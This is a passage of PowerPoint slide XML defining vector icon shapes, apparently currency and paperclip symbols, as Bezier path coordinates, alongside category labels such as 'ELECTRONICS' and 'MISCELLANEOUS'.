                  <a:pt x="8836" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8566" y="0"/>
                  <a:pt x="8345" y="220"/>
                  <a:pt x="8345" y="491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8345" y="5400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8345" y="5671"/>
                  <a:pt x="8566" y="5891"/>
                  <a:pt x="8836" y="58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2" name="Shape 2782"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8371907" y="5568093"/>
            <a:ext cx="279597" cy="241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83" h="20545" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="9621" y="9676"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9621" y="9676"/>
                  <a:pt x="9621" y="9675"/>
                  <a:pt x="9621" y="9675"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9620" y="9674"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9620" y="9674"/>
                  <a:pt x="9621" y="9676"/>
                  <a:pt x="9621" y="9676"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19582" y="1266"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18115" y="-422"/>
                  <a:pt x="15737" y="-422"/>
                  <a:pt x="14270" y="1266"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14934" y="2030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16034" y="765"/>
                  <a:pt x="17818" y="765"/>
                  <a:pt x="18918" y="2030"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20019" y="3297"/>
                  <a:pt x="20019" y="5351"/>
                  <a:pt x="18918" y="6618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8956" y="17881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9621" y="18645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19582" y="7382"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21050" y="5693"/>
                  <a:pt x="21050" y="2955"/>
                  <a:pt x="19582" y="1266"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="2315" y="17881"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="481" y="15770"/>
                  <a:pt x="481" y="12551"/>
                  <a:pt x="2315" y="10439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2317" y="10437"/>
                  <a:pt x="2320" y="10434"/>
                  <a:pt x="2323" y="10431"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2323" y="10431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9289" y="2413"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9472" y="2201"/>
                  <a:pt x="9472" y="1859"/>
                  <a:pt x="9289" y="1648"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9105" y="1437"/>
                  <a:pt x="8808" y="1437"/>
                  <a:pt x="8624" y="1648"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1651" y="9675"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-550" y="12208"/>
                  <a:pt x="-550" y="16112"/>
                  <a:pt x="1651" y="18645"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3852" y="21178"/>
                  <a:pt x="7420" y="21178"/>
                  <a:pt x="9621" y="18645"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8948" y="17889"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7114" y="19991"/>
                  <a:pt x="4147" y="19989"/>
                  <a:pt x="2315" y="17881"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6300" y="13497"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7033" y="14341"/>
                  <a:pt x="8223" y="14341"/>
                  <a:pt x="8956" y="13497"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13937" y="7764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14121" y="7553"/>
                  <a:pt x="14121" y="7211"/>
                  <a:pt x="13937" y="7000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13754" y="6789"/>
                  <a:pt x="13457" y="6789"/>
                  <a:pt x="13273" y="7000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8292" y="12732"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7926" y="13155"/>
                  <a:pt x="7331" y="13155"/>
                  <a:pt x="6964" y="12732"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6597" y="12310"/>
                  <a:pt x="6597" y="11626"/>
                  <a:pt x="6964" y="11204"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8292" y="9675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14934" y="2030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14270" y="1266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6300" y="10439"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5566" y="11284"/>
                  <a:pt x="5566" y="12653"/>
                  <a:pt x="6300" y="1349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3" name="Shape 2783"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905168" y="5568093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4" name="Shape 2784"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9438429" y="554904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5" name="Shape 2785"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9971691" y="5574441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6" name="Shape 2786"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10504951" y="5561745"/>
            <a:ext cx="279127" cy="2539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87" name="Shape 2787"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11038212" y="5549048"/>
            <a:ext cx="279155" cy="279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5" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5420086" y="741613"/>
            <a:ext cx="1153832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ELECTRONICS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57" name="Shape 2707"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296977" y="3428968"/>
            <a:ext cx="1400053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MISCELLANEOUS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40911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Shape 2790"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="146463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1" name="Shape 2791"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="145193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69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69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69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2" name="Shape 2792"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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949" y="13580"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11701" y="13784"/>
                  <a:pt x="11474" y="13901"/>
                  <a:pt x="11085" y="13931"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11085" y="11339"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11251" y="11383"/>
                  <a:pt x="11321" y="11435"/>
                  <a:pt x="11479" y="11494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11638" y="11554"/>
                  <a:pt x="11780" y="11632"/>
                  <a:pt x="11906" y="11728"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12032" y="11824"/>
                  <a:pt x="12133" y="11943"/>
                  <a:pt x="12208" y="12084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0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10437" y="9837"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10286" y="9800"/>
                  <a:pt x="10228" y="9753"/>
                  <a:pt x="10081" y="9698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9933" y="9642"/>
                  <a:pt x="9803" y="9570"/>
                  <a:pt x="9692" y="9481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2"/>
                  <a:pt x="9309" y="8880"/>
                  <a:pt x="9309" y="8702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9309" y="8309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9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7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59"/>
                  <a:pt x="9600" y="6756"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9305" y="6852"/>
                  <a:pt x="9044" y="6991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199"/>
                  <a:pt x="8150" y="9541"/>
                  <a:pt x="8293" y="9815"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8438" y="10089"/>
                  <a:pt x="8626" y="10317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7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1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5"/>
                  <a:pt x="9136" y="14624"/>
                  <a:pt x="9460" y="14743"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9784" y="14861"/>
                  <a:pt x="10048" y="14924"/>
                  <a:pt x="10437" y="14932"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10437" y="15692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11085" y="15692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5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1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3" name="Shape 2793"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9513" y="14863"/>
                  <a:pt x="9355" y="14945"/>
                  <a:pt x="9084" y="14965"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9084" y="13151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9199" y="13182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3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9920" y="13772"/>
                  <a:pt x="9946" y="13894"/>
                  <a:pt x="9946" y="14039"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9946" y="14350"/>
                  <a:pt x="9859" y="14577"/>
                  <a:pt x="9686" y="14720"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8631" y="12100"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8526" y="12074"/>
                  <a:pt x="8486" y="12041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5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8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8214" y="10601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3"/>
                  <a:pt x="9898" y="12487"/>
                  <a:pt x="9683" y="12404"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9466" y="12321"/>
                  <a:pt x="9310" y="12248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3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6"/>
                  <a:pt x="10625" y="10883"/>
                  <a:pt x="10537" y="10690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10450" y="10499"/>
                  <a:pt x="10331" y="10340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3"/>
                  <a:pt x="9310" y="9842"/>
                  <a:pt x="9084" y="9842"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9084" y="9331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631" y="9331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8631" y="9842"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8405" y="9842"/>
                  <a:pt x="8253" y="9876"/>
                  <a:pt x="8048" y="9943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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7032" y="10899"/>
                  <a:pt x="6985" y="11119"/>
                  <a:pt x="6985" y="11368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6985" y="11654"/>
                  <a:pt x="7035" y="11892"/>
                  <a:pt x="7136" y="12085"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7237" y="12277"/>
                  <a:pt x="7368" y="12436"/>
                  <a:pt x="7531" y="12563"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7694" y="12691"/>
                  <a:pt x="7878" y="12794"/>
                  <a:pt x="8081" y="12875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8285" y="12956"/>
                  <a:pt x="8426" y="13024"/>
                  <a:pt x="8631" y="13081"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8631" y="14965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7"/>
                  <a:pt x="7726" y="14187"/>
                  <a:pt x="7731" y="13844"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6872" y="13844"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6867" y="14135"/>
                  <a:pt x="6908" y="14392"/>
                  <a:pt x="6996" y="14615"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7085" y="14839"/>
                  <a:pt x="7209" y="15027"/>
                  <a:pt x="7369" y="15180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7530" y="15333"/>
                  <a:pt x="7723" y="15451"/>
                  <a:pt x="7950" y="15534"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8176" y="15617"/>
                  <a:pt x="8360" y="15661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3"/>
                  <a:pt x="10124" y="15354"/>
                  <a:pt x="10285" y="15211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10445" y="15068"/>
                  <a:pt x="10573" y="14889"/>
                  <a:pt x="10666" y="14673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10758" y="14459"/>
                  <a:pt x="10805" y="14205"/>
                  <a:pt x="10805" y="13914"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10805" y="13634"/>
                  <a:pt x="10755" y="13398"/>
                  <a:pt x="10654" y="13206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10554" y="13014"/>
                  <a:pt x="10421" y="12853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9" y="987"/>
                  <a:pt x="20613" y="4502"/>
                  <a:pt x="20613" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20613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4" name="Shape 2794"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9019" y="8087"/>
                  <a:pt x="8691" y="8762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49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7"/>
                  <a:pt x="8419" y="10916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4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8489" y="11784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7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5"/>
                  <a:pt x="9839" y="12385"/>
                  <a:pt x="9753" y="11784"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11924" y="11784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2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0"/>
                  <a:pt x="11052" y="7724"/>
                  <a:pt x="11535" y="772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5" name="Shape 2795"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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49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2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10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7"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10798" y="10320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10307" y="9985"/>
                  <a:pt x="9826" y="9817"/>
                  <a:pt x="9356" y="9817"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8708" y="9817"/>
                  <a:pt x="8176" y="10026"/>
                  <a:pt x="7761" y="10441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7404" y="10804"/>
                  <a:pt x="7158" y="11296"/>
                  <a:pt x="7023" y="11917"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6594" y="11917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6384" y="12435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6967" y="12435"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6961" y="12495"/>
                  <a:pt x="6957" y="12549"/>
                  <a:pt x="6955" y="12598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6952" y="12646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49"/>
                  <a:pt x="6967" y="12987"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6602" y="12987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6384" y="13497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7007" y="13497"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7093" y="14146"/>
                  <a:pt x="7313" y="14662"/>
                  <a:pt x="7663" y="15045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1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59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9850" y="14945"/>
                  <a:pt x="9626" y="14989"/>
                  <a:pt x="9356" y="14989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8940" y="14989"/>
                  <a:pt x="8611" y="14834"/>
                  <a:pt x="8368" y="14527"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8158" y="14279"/>
                  <a:pt x="8020" y="13935"/>
                  <a:pt x="7955" y="13497"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9583" y="13497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5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7906" y="12549"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7906" y="12500"/>
                  <a:pt x="7909" y="12462"/>
                  <a:pt x="7914" y="12435"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9899" y="12435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2"/>
                  <a:pt x="8384" y="10968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8627" y="10682"/>
                  <a:pt x="8929" y="10539"/>
                  <a:pt x="9292" y="1053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6" name="Shape 2796"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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7"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12172" y="13338"/>
                  <a:pt x="10523" y="12824"/>
                  <a:pt x="9988" y="12695"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10421" y="11009"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10956" y="11139"/>
                  <a:pt x="12671" y="11395"/>
                  <a:pt x="12416" y="12387"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12637" y="8174"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12960" y="6916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0"/>
                  <a:pt x="11436" y="7853"/>
                  <a:pt x="11224" y="7806"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11541" y="6573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10753" y="6382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4"/>
                  <a:pt x="9283" y="10116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9257" y="10110"/>
                  <a:pt x="9229" y="10103"/>
                  <a:pt x="9200" y="10097"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8684" y="12103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7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6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8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6"/>
                  <a:pt x="13210" y="11058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7" name="Shape 2797"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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79"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9878" y="12752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79"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9860" y="13998"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9669" y="14737"/>
                  <a:pt x="8373" y="14338"/>
                  <a:pt x="7953" y="14238"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8293" y="12927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8714" y="13027"/>
                  <a:pt x="10060" y="13227"/>
                  <a:pt x="9860" y="13998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8"/>
                  <a:pt x="9090" y="10471"/>
                  <a:pt x="8925" y="10434"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9173" y="9476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7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4"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6885" y="10644"/>
                  <a:pt x="7345" y="10745"/>
                  <a:pt x="7335" y="10751"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7586" y="10812"/>
                  <a:pt x="7632" y="10971"/>
                  <a:pt x="7624" y="11098"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7335" y="12213"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7352" y="12216"/>
                  <a:pt x="7375" y="12222"/>
                  <a:pt x="7399" y="12232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7379" y="12227"/>
                  <a:pt x="7357" y="12222"/>
                  <a:pt x="7334" y="12216"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6928" y="13777"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6898" y="13851"/>
                  <a:pt x="6820" y="13960"/>
                  <a:pt x="6645" y="13919"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6651" y="13928"/>
                  <a:pt x="6194" y="13811"/>
                  <a:pt x="6194" y="13811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1"/>
                  <a:pt x="6990" y="14759"/>
                  <a:pt x="7134" y="14795"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6878" y="15784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7497" y="15933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7751" y="14954"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7921" y="14998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8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11324" y="13669"/>
                  <a:pt x="11041" y="13242"/>
                  <a:pt x="10485" y="12965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10890" y="12875"/>
                  <a:pt x="11195" y="12619"/>
                  <a:pt x="11277" y="12090"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11389" y="11368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7"/>
                  <a:pt x="12764" y="987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17098" y="987"/>
                  <a:pt x="20612" y="4501"/>
                  <a:pt x="20612" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20612" y="10878"/>
                  <a:pt x="19827" y="12732"/>
                  <a:pt x="18549" y="14128"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18468" y="14709"/>
                  <a:pt x="18341" y="15276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8" name="Shape 2798"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="1490025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8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11425" y="11731"/>
                  <a:pt x="11338" y="11646"/>
                  <a:pt x="11242" y="11581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11144" y="11515"/>
                  <a:pt x="11102" y="11458"/>
                  <a:pt x="11001" y="11410"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11001" y="14261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11238" y="14227"/>
                  <a:pt x="11377" y="14100"/>
                  <a:pt x="11528" y="13875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11680" y="13651"/>
                  <a:pt x="11756" y="13293"/>
                  <a:pt x="11756" y="12804"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11756" y="12576"/>
                  <a:pt x="11733" y="12384"/>
                  <a:pt x="11686" y="12229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11640" y="12074"/>
                  <a:pt x="11579" y="11944"/>
                  <a:pt x="11502" y="11838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2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2"/>
                  <a:pt x="17453" y="16200"/>
                  <a:pt x="17182" y="16200"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9917" y="8509"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9917" y="8706"/>
                  <a:pt x="9938" y="8872"/>
                  <a:pt x="9982" y="9011"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10026" y="9150"/>
                  <a:pt x="10082" y="9268"/>
                  <a:pt x="10150" y="9366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10219" y="9464"/>
                  <a:pt x="10298" y="9544"/>
                  <a:pt x="10388" y="9605"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10478" y="9665"/>
                  <a:pt x="10513" y="9717"/>
                  <a:pt x="10605" y="9757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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9981" y="7769"/>
                  <a:pt x="9917" y="8077"/>
                  <a:pt x="9917" y="8509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8"/>
                  <a:pt x="18655" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="19217"/>
                  <a:pt x="18690" y="19517"/>
                  <a:pt x="18745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4"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1136" y="5335"/>
                  <a:pt x="1300" y="5400"/>
                  <a:pt x="1473" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2286" y="5400"/>
                  <a:pt x="2945" y="4191"/>
                  <a:pt x="2945" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="2382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2"/>
                  <a:pt x="18655" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="4191"/>
                  <a:pt x="19314" y="5400"/>
                  <a:pt x="20127" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20300" y="5400"/>
                  <a:pt x="20464" y="5335"/>
                  <a:pt x="20618" y="5234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="5234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9" y="18000"/>
                  <a:pt x="20618" y="18403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  <a:moveTo>
                  <a:pt x="12385" y="13801"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12304" y="14141"/>
                  <a:pt x="12193" y="14422"/>
                  <a:pt x="12052" y="14646"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11912" y="14871"/>
                  <a:pt x="11747" y="15042"/>
                  <a:pt x="11558" y="15160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11369" y="15278"/>
                  <a:pt x="11221" y="15345"/>
                  <a:pt x="11001" y="15362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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10368" y="15353"/>
                  <a:pt x="10206" y="15284"/>
                  <a:pt x="10009" y="15154"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9811" y="15023"/>
                  <a:pt x="9642" y="14837"/>
                  <a:pt x="9501" y="14596"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9361" y="14356"/>
                  <a:pt x="9252" y="14061"/>
                  <a:pt x="9175" y="13710"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9098" y="13359"/>
                  <a:pt x="9062" y="12956"/>
                  <a:pt x="9066" y="12498"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9818" y="12498"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9813" y="13036"/>
                  <a:pt x="9877" y="13461"/>
                  <a:pt x="10009" y="13770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10140" y="14081"/>
                  <a:pt x="10302" y="14244"/>
                  <a:pt x="10605" y="14261"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10605" y="11299"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10425" y="11209"/>
                  <a:pt x="10302" y="11101"/>
                  <a:pt x="10124" y="10974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5"/>
                  <a:pt x="9385" y="10035"/>
                  <a:pt x="9297" y="9733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9209" y="9431"/>
                  <a:pt x="9165" y="9056"/>
                  <a:pt x="9165" y="8607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6"/>
                  <a:pt x="9617" y="6827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9755" y="6627"/>
                  <a:pt x="9914" y="6474"/>
                  <a:pt x="10094" y="6368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10275" y="6262"/>
                  <a:pt x="10408" y="6209"/>
                  <a:pt x="10605" y="6209"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10605" y="5406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11001" y="5406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11001" y="6209"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11199" y="6209"/>
                  <a:pt x="11329" y="6257"/>
                  <a:pt x="11505" y="6356"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11681" y="6454"/>
                  <a:pt x="11834" y="6601"/>
                  <a:pt x="11963" y="6796"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12093" y="6992"/>
                  <a:pt x="12196" y="7241"/>
                  <a:pt x="12273" y="7543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12350" y="7845"/>
                  <a:pt x="12389" y="8195"/>
                  <a:pt x="12389" y="8594"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11637" y="8594"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11628" y="8179"/>
